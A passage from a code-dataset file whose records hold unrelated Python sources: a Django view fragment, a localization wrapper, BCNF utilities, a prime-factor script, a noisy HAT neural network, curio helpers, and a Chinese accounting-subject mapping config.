int(dist['product_quantity'])\r\n # if pib.quantity >5:\r\n # data['error']='В корзине не может быть больше пяти порций товара!'\r\n # else:\r\n # pib.save()\r\n\r\n return HttpResponse(json.dumps(data), content_type='application/json')\r\n else:\r\n raise Http404","sub_path":"refectory/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"409503699","text":"import subprocess\nimport os\nfrom subprocess import call\nfrom Parser import ParseLocalizationResults\n\n\"\"\"\n This class will handle calling the localization routine,\n parse the results to find K, R, T and return them to \n the callee.\n\"\"\"\nclass Localize():\n def __init__(self, configManager):\n self.__imageFileName = None\n self.__directoryName = None\n self.__K = None\n self.__R = None\n self.__T = None\n self.__confManager = configManager\n self.__localizationBinary = self.__confManager.getLocalizationBinaryPath()\n self.__knnLocalizationBinary = self.__confManager.getKNNLocalizationBinaryPath()\n self.__activeSearchLocalizationBinary = self.__confManager.getActiveSearchLocalizationBinary()\n self.__dictionary = self.__confManager.getDictionary()\n self.__computedDescriptorsLocalizationBin = self.__confManager.getComputedDescriptorsLocalizationBin()\n self.__computedDescriptorsActiveSearchBin = 
self.__confManager.getComputedDescriptorsActiveSearchBin()\n self.__listQueryText = None\n self.__numberOfClusters = self.__confManager.getNumberOfClusters()\n self.__bundleDotOut = self.__confManager.getBundletDotOutFile()\n self.__technique = self.__confManager.getTechnique()\n\n \"\"\"\n Create a temporary file that can be simply passed to localization\n routine.\n \"\"\"\n def setImageFileName(self, imagePath):\n self.__imageFileName = imagePath\n self.__directoryName = os.path.dirname(imagePath)\n filename_w_ext = os.path.basename(self.__imageFileName)\n filename, file_extension = os.path.splitext(filename_w_ext)\n self.__listQueryText = os.path.join(self.__directoryName,\"list.query.keys.txt\")\n\n with open(self.__listQueryText, 'w') as fp:\n fp.write(os.path.join(self.__directoryName,filename+\".key\"))\n\n def display(self):\n print(\" ImageFileName = \" + self.__imageFileName)\n\n\n \"\"\"\n This function calls the localization routine, its results are saved \n in a temporary text file. Which is then parsed to find the desired\n matrices\n \"\"\"\n def localize(self):\n localizationResultsFile = 'localizationResults.txt'\n internalLocalizationResults = os.path.join(self.__directoryName, \"results.txt\")\n\n with open(localizationResultsFile, 'wb') as fp_out:\n if self.__technique == '0':\n print(\"Using ACG Localizer\")\n call([self.__localizationBinary, self.__listQueryText, \"1\", self.__numberOfClusters, self.__dictionary, self.__computedDescriptorsLocalizationBin, \"0\", \"0.2\", \"0 \", internalLocalizationResults], stdout=fp_out)\n else:\n print(\"Using Active Search\")\n call([self.__activeSearchLocalizationBinary, self.__listQueryText, self.__bundleDotOut, self.__numberOfClusters, self.__dictionary, self.__computedDescriptorsActiveSearchBin, \"0\", internalLocalizationResults, \"200\", \"1\", \"1\", \"1\", \"10\"], stdout=fp_out)\n\n parser = ParseLocalizationResults.Parser()\n parser.setResultsFile(localizationResultsFile)\n parsedResults = parser.parse()\n print(\"Parsed Results :: \", parsedResults)\n return parsedResults","sub_path":"Localization/Localize.py","file_name":"Localize.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"484916546","text":"#!/usr/bin/env python\n\n__author__ = 'Giovanni Venancio de Souza'\n\n\nimport sys\nimport itertools\n\n\nclass BCNF(object):\n\n def get_functional_dependencies(self, inputs):\n \"\"\"\n Get functional dependencies from stdin\n \"\"\"\n\n FD, dependencies = [], []\n\n for deps in inputs:\n if deps.endswith('\\n'):\n dependencies.append([deps[:-1]])\n else:\n dependencies.append([deps])\n\n for dep in dependencies:\n dep = dep[0].split('->')\n FD.append([ dep[0].split(','), dep[1].split(',') ])\n\n return FD\n\n def super_relation(self, dependencies):\n \"\"\"\n Create super relation from funcional dependencies\n \"\"\"\n\n attrs = []\n\n for dep in dependencies:\n attrs += dep[0]\n attrs += dep[1]\n\n relation = set()\n for attr in attrs:\n relation.add(attr)\n\n return list(relation)\n\n def closure(self, dependencies, super_relation):\n \"\"\"\n Calculate key from closure of functional dependencies\n \"\"\"\n\n # In a list of FDs (X->Y), holds all X attributes\n x = []\n\n for dep in dependencies:\n x += dep[0]\n\n # Holds combinations of all attributes (candidate keys)\n c_keys = []\n\n # Generate combinations\n for e in range(1, len(x)):\n for combination in itertools.combinations(x, e):\n c_keys.append(combination)\n\n 
for key in c_keys:\n # Holds attributes from closure\n key_set = set(key)\n\n while True:\n old_set = key_set.copy()\n\n for dep in dependencies:\n # Verify if all attributes from X of FD is in closure set\n for attr in dep[0]:\n found = True if attr in list(key_set) else False\n if found:\n for attr in dep[1]:\n key_set.add(attr)\n\n # If set hasn't changed\n if old_set == key_set:\n break\n\n # If candidate key generate all attributes of super relation,\n # we found the key of super relation\n if key_set == set(super_relation):\n return list(key)\n\n # If no key is found, a candidate key is used\n return BCNF.candidate_key(self, dependencies)\n\n def candidate_key(self, dependencies):\n \"\"\"\n Calculate candidate key for super relation\n Get all attributes that appear on left-side but not on the right-side of FDs\n \"\"\"\n\n candidate_key = []\n\n # In a list of FDs (X->Y), get all X attributes\n attrs = []\n\n for dep in dependencies:\n attrs += dep[0]\n\n for x in attrs:\n found = False\n\n for attr in dependencies:\n if x in attr[1]:\n found = True\n break\n\n if not found:\n candidate_key.append(x)\n\n return candidate_key\n\n def write_final_relations(self, rn, violates):\n \"\"\"\n Write to stdout the result of decomposition\n \"\"\"\n\n i = 0\n\n sys.stdout.write('R0(%s)' % (','.join(rn[0])) + '\\n')\n\n for relations in rn:\n if i not in violates:\n sys.stdout.write('R%d(%s)' % (i, ','.join(relations)) + '\\n')\n\n i += 1\n","sub_path":"Grade/Banco de Dados/trabalho 1/gvs11/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"452823917","text":"a=int(input(\"enter a loop 1st number.\\n\"))\r\nb=int(input(\"input last number.\\n\"))\r\na=b//2\r\nwhile a>1:\r\n print(\"\\na:\",a,end=' ')\r\n if b % a ==0:\r\n print(b,\"has_factor\",a)\r\n break\r\n a=a-1\r\n \r\nelse:\r\n print(b,\"is_prime.\\n\")\r\n","sub_path":"factor.py","file_name":"factor.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"163683597","text":"import sys\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport utils\n\nclass NoisyLinear(nn.Module):\n def __init__(self, in_features, out_features, bias=True):\n super(NoisyLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(out_features, in_features))\n self.weight_noise = Parameter(torch.Tensor(out_features, in_features), requires_grad=False)\n self.bias = Parameter(torch.Tensor(out_features))\n self.bias_noise = Parameter(torch.Tensor(out_features), requires_grad=False)\n self.reset_parameters()\n\n def reset_parameters(self):\n # param initialization\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n # noise param initialization\n init.kaiming_uniform_(self.weight_noise, a=math.sqrt(5))\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight_noise)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias_noise, -bound, bound)\n\n def forward(self,x, x_noise=None):\n if x_noise is None:\n x_noise = x\n output_origin = F.linear(x, self.weight, self.bias)\n output_noise = F.linear(x_noise, self.weight_noise, 
self.bias_noise)\n return output_origin, output_noise\n\nclass Net(torch.nn.Module):\n def __init__(self,inputsize,taskcla,nlayers=2,nhid=2000,pdrop1=0.2,pdrop2=0.5):\n super(Net,self).__init__()\n\n ncha,size,_=inputsize\n self.taskcla=taskcla\n\n self.nlayers=nlayers\n\n self.relu=torch.nn.ReLU()\n #self.drop1=torch.nn.Dropout(pdrop1)\n #self.drop2=torch.nn.Dropout(pdrop2)\n #self.fc1=torch.nn.Linear(ncha*size*size,nhid)\n self.fc1 = NoisyLinear(ncha*size*size,nhid)\n self.efc1=torch.nn.Embedding(len(self.taskcla),nhid)\n if nlayers>1:\n #self.fc2=torch.nn.Linear(nhid,nhid)\n self.fc2=NoisyLinear(nhid,nhid)\n self.efc2=torch.nn.Embedding(len(self.taskcla),nhid)\n if nlayers>2:\n #self.fc3=torch.nn.Linear(nhid,nhid)\n self.fc3=NoisyLinear(nhid,nhid)\n self.efc3=torch.nn.Embedding(len(self.taskcla),nhid)\n self.last=torch.nn.ModuleList()\n for t,n in self.taskcla:\n #self.last.append(torch.nn.Linear(nhid,n))\n self.last.append(NoisyLinear(nhid,n))\n\n self.gate=torch.nn.Sigmoid()\n \"\"\" (e.g., used with compression experiments)\n lo,hi=0,2\n self.efc1.weight.data.uniform_(lo,hi)\n self.efc2.weight.data.uniform_(lo,hi)\n self.efc3.weight.data.uniform_(lo,hi)\n #\"\"\"\n\n return\n\n def forward(self,t,x,s=1):\n # Gates\n masks=self.mask(t,s=s)\n if self.nlayers==1:\n gfc1=masks\n elif self.nlayers==2:\n gfc1,gfc2=masks\n elif self.nlayers==3:\n gfc1,gfc2,gfc3=masks\n else:\n raise ValueError\n # Gated\n #h=self.drop1(x.view(x.size(0),-1)) # Original code, applying dropout on input data and hidden layers\n #h=self.drop2(self.relu(self.fc1(h)))\n h = x.view(x.size(0),-1)\n output1_origin, output1_noise = self.fc1(h)\n output1 = output1_origin.mul_(gfc1.abs().sign()) + output1_noise\n h1 = self.relu(output1)\n h_origin, h_noise = h1.mul_(gfc1), h1\n if self.nlayers>1:\n output2_origin, output2_noise = self.fc2(h_origin, h_noise)\n output2 = output2_origin.mul_(gfc2.abs().sign()) + output2_noise\n h2 = self.relu(output2)\n h_origin, h_noise = h2.mul_(gfc2), h2\n #h=self.drop2(self.relu(self.fc2(h)))\n #h=h*gfc2.expand_as(h)\n if self.nlayers>2:\n output3_origin, output3_noise = self.fc3(h_origin, h_noise)\n output3 = output3_origin.mul_(gfc3.abs().sign()) + output3_noise\n h3 = self.relu(output3)\n h_origin, h_noise = h3.mul_(gfc3), h3\n #h=self.drop2(self.relu(self.fc3(h)))\n #h=h*gfc3.expand_as(h)\n y=[]\n for t,i in self.taskcla:\n output_origin, output_noise = self.last[t](h_origin, h_noise)\n y.append(output_origin + output_noise)\n return y, masks\n\n def mask(self,t,s=1):\n gfc1=self.gate(s*self.efc1(t))\n if self.nlayers==1: return gfc1\n gfc2=self.gate(s*self.efc2(t))\n if self.nlayers==2: return [gfc1,gfc2]\n gfc3=self.gate(s*self.efc3(t))\n return [gfc1,gfc2,gfc3]\n\n def get_view_for(self,name,masks):\n if self.nlayers==1:\n gfc1=masks\n elif self.nlayers==2:\n gfc1,gfc2=masks\n elif self.nlayers==3:\n gfc1,gfc2,gfc3=masks\n if name == 'fc1.weight':\n return gfc1.data.view(-1,1).expand_as(self.fc1.weight)\n elif name == 'fc1.bias':\n return gfc1.data.view(-1)\n elif name == 'fc2.weight':\n post = gfc2.data.view(-1,1).expand_as(self.fc2.weight)\n pre = gfc1.data.view(1,-1).expand_as(self.fc2.weight)\n return torch.min(post,pre)\n elif name == 'fc2.bias':\n return gfc2.data.view(-1)\n elif name == 'fc3.weight':\n post = gfc3.data.view(-1,1).expand_as(self.fc3.weight)\n pre = gfc2.data.view(1,-1).expand_as(self.fc3.weight)\n return torch.min(post,pre)\n elif name == 'fc3.bias':\n return gfc3.data.view(-1)\n else:\n return 
None\n\n","sub_path":"NoisyHAT/networks/noisymlp_hat.py","file_name":"noisymlp_hat.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"430338521","text":"import codecs\nfrom curio.meta import finalize\n\n\nasync def stream_decode_response_unicode(iterator, r):\n \"\"\"Stream decodes a iterator.\"\"\"\n\n async with finalize(iterator) as iterator:\n if r.encoding is None:\n async for item in iterator:\n yield item\n return\n\n decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')\n async for chunk in iterator:\n rv = decoder.decode(chunk)\n if rv:\n yield rv\n rv = decoder.decode(b'', final=True)\n if rv:\n yield rv\n\n\nasync def iter_slices(string, slice_length):\n \"\"\"Iterate over slices of a string.\"\"\"\n pos = 0\n if slice_length is None or slice_length <= 0:\n slice_length = len(string)\n while pos < len(string):\n yield string[pos:pos + slice_length]\n pos += slice_length\n","sub_path":"curequests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"328146408","text":"# 货币资金\nmonetary_funds = [\"库存现金\",\"银行存款\",\"其他货币资金\"]\n# 存货类科目\ninventory = [\"原材料\", \"包装物\", \"低值易耗品\", \"库存商品\", \"委托加工物资\", \"周转材料\", \"材料采购\", \"物资采购\",\"材料采购\", \"包装物及低值易耗品\", \"产成品\", \"生产成本\",\"主营业务成本\"]\n# 存货类科目包含税费\ninventory_tax = [\"原材料\", \"包装物\", \"低值易耗品\", \"库存商品\", \"委托加工物资\", \"周转材料\", \"材料采购\", \"物资采购\",\"材料采购\", \"包装物及低值易耗品\", \"产成品\",\"应交税费\",\"生产成本\",\"主营业务成本\"]\n# 长期资产类科目\nlong_term_assets = [\"固定资产\", \"无形资产\", \"在建工程\", \"工程物资\", \"长期待摊费用\", \"开发支出\"]\n# 长期资产类科目\nlong_term_assets_tax = [\"固定资产\", \"无形资产\", \"在建工程\", \"工程物资\", \"长期待摊费用\", \"开发支出\",\"应交税费\"]\n# 费用类科目\nexpense = [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\"]\n# 费用类科目包含税费\nexpense_tax = [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\",\"应交税费\"]\n# 收入确认借方标准科目\nrecognition_income_debit = [\"应收账款\",\"库存现金\",\"银行存款\",\"预收款项\",\"合同负债\",\"长期应收款\",\"应收票据\"]\n# 收入确认贷方标准科目\nrecognition_income_credit = [\"应交税费\",\"主营业务收入\"]\n# 应收款项\nreceivables = [\"应收账款\",\"预付款项\",\"其他应收款\",\"应收票据\"]\n# 应付款项\npayments = [\"应付账款\",\"预收款项\",\"其他应付款\",\"应付票据\"]\n# 应交税费\ntax_payable = {\"应交个人所得税\":\"个人所得税\",\"应交土地使用税\":\"土地使用税\",\"应交堤围费\":\"堤围费\",\"应交堤围防护费\":\"堤围费\",\n \"应交企业所得税\":\"企业所得税\",\"应交所得税\":\"企业所得税\",\"应交城市维护建设税\":\"城市维护建设税\",\"应交城建税\":\"城市维护建设税\",\n \"应交房产税\":\"房产税\",\"应交土地增值税\":\"土地增值税\",\"应交车船使用税\":\"车船使用税\",\"应交车船税\":\"车船使用税\",\n \"应交印花税\":\"印花税\",\"应交城镇土地使用税\":\"土地使用税\",\"应交地方教育费附加\":\"地方教育费附加\",\n \"应交消费税\":\"消费税\",\"应交营业税\":\"营业税\",\"应交资源税\":\"资源税\",\"预交增值税\":\"增值税-预交增值税\",\n \"待抵扣进项税额\":\"增值税-待抵扣进项税额\",\"已交税金\":\"已交税金\",\"未交增值税\":\"增值税-未交增值税\",\n \"待转销项税额\":\"增值税-待转销项税额\",\"增值税留抵税额\":\"增值税-增值税留抵税额\",\"简易计税\":\"增值税-简易计税\",\n \"转让金融商品应交增值税\":\"增值税-转让金融商品应交增值税\",\"代扣代交增值税\":\"增值税-代扣代缴增值税\",\n \"转出未交增值税\":\"增值税-转出未交增值税\",\"减免税款\":\"增值税-减免税款\",\"出口退税\":\"增值税-出口退税\",\n \"出口抵减内销产品应纳税额\":\"增值税-出口抵减内销产品应纳税额\",\"销项税额\":\"增值税-销项税额\",\n \"进项税额转出\":\"增值税-进项税额转出\",\"转出多交增值税\":\"增值税-转出多交增值税\",\"销项税额抵减\":\"增值税-销项税额抵减\"\n }\n# 往来款项\nreceivables_and_payments = [\"应收账款\",\"预付款项\",\"其他应收款\",\"应付账款\",\"预收款项\",\"其他应付款\"]\n# 其他应收款款项性质\nother_receivable_natures = [\n {\"keywords\": [\"押金\",\"保证金\",\"质保金\",\"履约金\"],\"contain_event\":\"押金及保证金\",\"problem\": None},\n {\"keywords\": [\"罚款\",\"赔款\",\"保险赔款\"],\"contain_event\":\"罚款及赔款\",\"problem\": None},\n {\"keywords\": 
[\"备用金\",\"员工借款\"],\"contain_event\":\"员工备用金\",\"problem\": None},\n {\"keywords\": [\"代缴\",\"代垫\",\"代付\",\"水电费\",\"医药费\",\"房租费\",\"社保\",\"公积金\",\n \"养老保险\",\"医疗保险\",\"失业保险\",\"工伤保险\",\"生育保险\",\"社会保险\"],\"contain_event\":\"代缴代付款\",\"problem\": None},\n {\"keywords\": [\"公司\",\"厂\",\"往来款\",\"集团内部\",\"内部往来\"],\"contain_event\":\"公司往来款\",\"problem\": None},\n ]\nother_payable_natures = [\n {\"keywords\": [\"押金\", \"保证金\",\"质保金\",\"履约金\"], \"contain_event\": \"押金及保证金\", \"problem\": None},\n {\"keywords\": [\"罚款\", \"赔款\", \"保险赔款\"], \"contain_event\": \"罚款及赔款\", \"problem\": None},\n {\"keywords\": [ \"代收\", \"水电费\", \"医药费\", \"房租费\", \"社保\", \"公积金\",\n \"养老保险\", \"医疗保险\", \"失业保险\", \"工伤保险\", \"生育保险\", \"社会保险\"], \"contain_event\": \"暂收代付款\", \"problem\": None},\n {\"keywords\": [\"公司\", \"厂\", \"往来款\",\"集团内部\",\"内部往来\"], \"contain_event\": \"公司往来款\", \"problem\": None},\n ]\n# 资产减值准备\nasset_impairment = [\"坏账准备\",\"存货跌价准备\",'可供出售金融资产减值准备',\"持有至到期投资减值准备\",\"债权投资减值准备\",\n \"长期股权投资减值准备\",\"固定资产减值准备\",\"在建工程减值准备\",\"无形资产减值准备\",\n \"商誉减值准备\"\n ]\n# 流动资产\ncurrent_assets = [*monetary_funds,\"结算备付金\",\"拆出资金\",\"交易性金融资产\",\"以公允价值计量且其变动计入当期损益的金融资产\",\n \"衍生金融资产\",\"应收票据\",\"应收账款\",\"待摊费用\",\"预付款项\",\"应收股利\",\"应收利息\",\"应收保费\",\"应收分保账款\",\"应收分保合同准备金\",\n \"内部存款\",\"内部存款\",\"应收补贴款\",\"其他应收款\",\"买入返售金融资产\",*inventory,\"合同资产\",\"持有待售资产\",\"一年内到期的非流动资产\",\n \"待处理财产损溢\",\"其他流动资产\"\n ]\n# 非流动资产\nnon_current_assets = [\n \"委托贷款\",\"发放委托贷款及垫款\",\"债权投资\",\"可供出售金融资产\",\"其他债权投资\",\"持有至到期投资\",\"长期应收款\",\"长期股权投资\",\n \"其他权益工具投资\",\"其他非流动金融资产\",\"投资性房地产\",\"固定资产\",\"固定资产清理\",\"在建工程\",\"生产性生物资产\",\"油气资产\",\n \"使用权资产\",\"无形资产\",\"工程物资\",\"开发支出\",\"商誉\",\"长期待摊费用\",\"递延所得税资产\",\"其他非流动资产\"\n]\n# 资产\nassets = [*current_assets,*non_current_assets]\n# 流动负债\ncurrent_liabilities = [\"短期借款\",\"向中央银行借款\",\"吸收存款及同业存放\",\"拆入资金\",\"交易性金融负债\",\"以公允价值计量且其变动计入当期损益的金融负债\",\n \"衍生金融负债\",\"应付票据\",\"应付账款\",\"预收款项\",\"卖出回购金融资产款\",\"应付手续费及佣金\",\"应付职工薪酬\",\"应付福利费\",\n \"其他应交款\",\"应付利息\",\"应付股利\",\"应交税费\",\"预提费用\",\"其他应付款\",\"应付分保账款\",\"合同负债\",\"保险合同准备金\",\n \"代理买卖证券款\",\"代理承销证券款\",\"持有待售负债\",\"一年内到期的非流动负债\",\"其他流动负债\"\n ]\n# 非流动负债\nnon_current_liabilities = [\"长期借款\",\"应付债券\",\"租赁负债\",\"长期应付款\",\"专项应付款\",\"长期应付职工薪酬\",\"预计负债\",\"递延收益\",\n \"递延所得税负债\",\"附属企业往来\",\"其他非流动负债\"\n ]\n# 负债\nliabilities = [*current_liabilities,*non_current_liabilities]\n# 所有者权益\nequity = [\"股本\",\"其他权益工具\",\"资本公积\",\"库存股\",\"其他综合收益\",\"专项储备\",\"盈余公积\",\"一般风险准备\",\"少数股东权益\"]\n# 收入\nincome = [\"主营业务收入\",\"其他业务收入\",\"租赁收入\",\"利息收入\",\"已赚保费\",\"手续费及佣金收入\",\"其他收益\",\"投资收益\",\"净敞口套期收益\",\n \"公允价值变动收益\",\"资产处置收益\",\"汇兑收益\",\"营业外收入\"]\n# 成本费用\ncost = [\"主营业务成本\",\"其他业务成本\",\"利息支出\",\"手续费及佣金支出\",\"退保金\",\"赔付支出净额\",\"提取保险合同准备金净额\",\"保单红利支出\",\n \"分保费用\",\"税金及附加\",\"销售费用\",\"管理费用\",\"研发费用\",\"财务费用\",\"信用减值损失\",\"资产减值损失\",\"营业外支出\",\"所得税费用\"]\n\nmonetary_funds_and_financial_fee = [\"库存现金\",\"银行存款\",\"其他货币资金\",\"财务费用\"]\n# 增值税标准销项税率\nsale_rate = {\n \"1994-1-1\":[0.17,0.13,0.06],\n \"2017-7-1\":[0.17,0.11,0.06],\n \"2018-5-1\":[0.16,0.10,0.06],\n \"2019-4-1\":[0.13,0.09,0.06]\n}\n# 其他业务收入-租赁收入描述\nother_income_rent_desc = [\"出租\",\"租赁\",\"租金\"]\n# 利息描述\ninterest_desc = [\"利息\",\"结息\"]\n# 手续费描述\nbank_charges_desc = [\"手续费\",\"服务费\"]\n# 汇兑损益描述\nexchange_desc = [\"汇率\",\"汇兑\",\"外币\",\"结汇\",\"兑换\",\"折算\"]\n# 职工薪酬描述\nsalary_desc = [\"工资\",\"奖金\",\"福利\",\"津贴\",\"社会保险\",\"社保\",\"养老保险\",\"劳动保险\",\"医疗保险\",\n \"失业保险\",\"工伤保险\",\"公积金\",\"生育保险\",\"意外伤害险\",\"直接人工\",\"人工费\",\"职工教育经费\",\n \"退休金\",\"工会经费\",\"过节费\",\"辞退福利\",\"职工薪酬\",\"补充养老保险\",\"补充医疗保险\"\n ]\n# 
职工薪酬归集科目\nsalary_collection_subjects= [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\",\"在建工程\", \"长期待摊费用\", \"开发支出\",\"生产成本\"]\n# 应收票据减少标准科目名称\nnotes_receivable_subjects = [\"银行存款\",\"财务费用\",\"应收票据\",\"应付账款\"]\n# 财政贴息描述\ninterest_on_financial_subsidy = [\"财政贴息\", \"政府贴息\",\"贴息\"]\n# 政府补助\ngovernment_grants = [\"政府补助\", \"政府补贴\"]\n# 应付债券-应计利息\nbonds_payable_interest = [\"应计利息\"]\n# 营业成本\noperating_cost = [\"主营业务成本\",\"其他业务成本\"]\n# 利息归集科目\ninterest_collection_subjects=[\"在建工程\",\"财务费用\",\"制造费用\"]\n# 科目对应的描述\n\nsubject_descs = [\n {\"no\":1,\"subject\":\"本年利润\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":[\"利润分配\"],\"event\":\"本年利润结转至利润分配\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"损益结转至本年利润\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"利润分配\"],\"event\":\"本年利润结转至利润分配\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"损益结转至本年利润\",\"problem\":None},\n ]},\n{\"no\":2,\"subject\":\"主营业务收入\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"主营业务收入在借方\",\"problem\":\"主营业务收入在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认主营业务收入\",\"problem\":None},\n ]},\n{\"no\":3,\"subject\":\"其他业务收入\",\"debit_only_one\":False,\"debit\":\n[\n {\"opposite\":\"all\",\"event\":\"其他业务收入在借方\",\"problem\":\"其他业务收入在借方\"},\n ],\n\n \"credit_only_one\":False,\n \"credit\":{\"keywords\":other_income_rent_desc,\"contain_event\":\"确认其他业务收入-租赁收入\",\"not_contain_event\":\"确认其他业务收入-非租赁收入\"}\n },\n{\"no\":4,\"subject\":\"应收账款\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"应收账款增加-非收入确认\",\"problem\":\"应收账款增加-非收入确认\"},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"应收账款减少-收回货币资金\",\"problem\":None},\n {\"opposite\":monetary_funds_and_financial_fee,\"event\":\"应收账款减少-带折扣收回货币资金\",\"problem\":None},\n {\"opposite\":inventory_tax,\"event\":\"应收账款减少-交换存货\",\"problem\":None},\n {\"opposite\":long_term_assets_tax,\"event\":\"应收账款减少-交换长期资产\",\"problem\":None},\n {\"opposite\":expense_tax,\"event\":\"应收账款减少-转为费用\",\"problem\":None},\n {\"opposite\":payments,\"event\":\"应收账款减少-冲减应付款\",\"problem\":None},\n {\"opposite\":[\"应收票据\"],\"event\":\"应收账款减少-转为应收票据\",\"problem\":None},\n {\"opposite\":receivables,\"event\":\"应收账款减少-转为其他应收款项\",\"problem\":None},\n ]},\n{\"no\":5,\"subject\":\"应收票据\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"应收票据增加-非应收账款转入\",\"problem\":\"应收票据增加-非应收账款转入\"},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"应收票据减少-收回货币资金\",\"problem\":None},\n {\"opposite\":monetary_funds_and_financial_fee,\"event\":\"应收票据减少-贴现\",\"problem\":None},\n {\"opposite\":payments,\"event\":\"应收票据减少-冲减应付款\",\"problem\":None},\n ]},\n{\"no\":6,\"subject\":\"预收款项\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"预收款项减少-非收入确认\",\"problem\":\"预收款项减少-非收入确认\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"预收款项增加-收到货币资金\",\"problem\":None},\n ]},\n{\"no\":7,\"subject\":\"主营业务成本\",\"debit_only_one\":True,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"结转主营业务成本\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"主营业务成本在贷方\",\"problem\":\"主营业务成本在贷方\"},\n ]},\n{\"no\":8,\"subject\":\"其他业务成本\",\"debit_only_one\":True,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"结转其他业务成本\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n 
\"credit\":[\n {\"opposite\":\"all\",\"event\":\"其他业务成本在贷方\",\"problem\":\"其他业务成本在贷方\"},\n ]},\n{\"no\":8,\"subject\":\"预计负债\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":monetary_funds,\"event\":\"偿还预计负债\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"固定资产\"],\"event\":\"预计负债-固定资产弃置义务\",\"problem\":None},\n {\"opposite\":[\"油气资产\"],\"event\":\"预计负债-油气资产弃置义务\",\"problem\":None},\n {\"opposite\":[\"财务费用\"],\"event\":\"预计负债-计提预计负债利息\",\"problem\":None},\n ]},\n{\"no\":39,\"subject\":\"固定资产清理\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付固定资产清理款\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付固定资产清理款\", \"problem\": None},\n {\"opposite\": [\"固定资产\"], \"event\": \"固定资产转入清理\", \"problem\": None},\n {\"opposite\": [\"营业外收入\"], \"event\": \"营业外收入-处置固定资产\", \"problem\": \"固定资产处置不在营业外收入核算,应归集为资产处置收益\"},\n {\"opposite\": [\"资产处置收益\"], \"event\": \"资产处置收益-固定资产处置\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"营业外支出\"],\"event\":\"营业外支出-固定资产毁损报废\",\"problem\":\"检查固定资产是否为毁损报废,无使用价值。如果不是毁损报废,应计入资产处置收益。\"},\n {\"opposite\":[\"其他应收款\"],\"event\":\"处置固定资产应收款\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"收到固定资产清理款\",\"problem\":None},\n ]},\n{\"no\":21,\"subject\":\"资产减值损失\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"计提资产减值损失\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减资产减值损失\",\"problem\":None},\n ]},\n{\"no\":21,\"subject\":\"长期股权投资减值准备\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":[\"长期股权投资\",\"应收股利\",\"投资收益\"],\"event\":\"处置长期股权投资\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"长期股权投资减值准备增加\",\"problem\":\"长期股权投资减值准备增加\"},\n ]},\n{\"no\":21,\"subject\":\"固定资产减值准备\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"固定资产减值准备减少\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"固定资产减值准备增加\",\"problem\":\"固定资产减值准备增加\"},\n ]},\n{\"no\":21,\"subject\":\"无形资产减值准备\",\"debit_only_one\":True,\n\"debit\":[\n 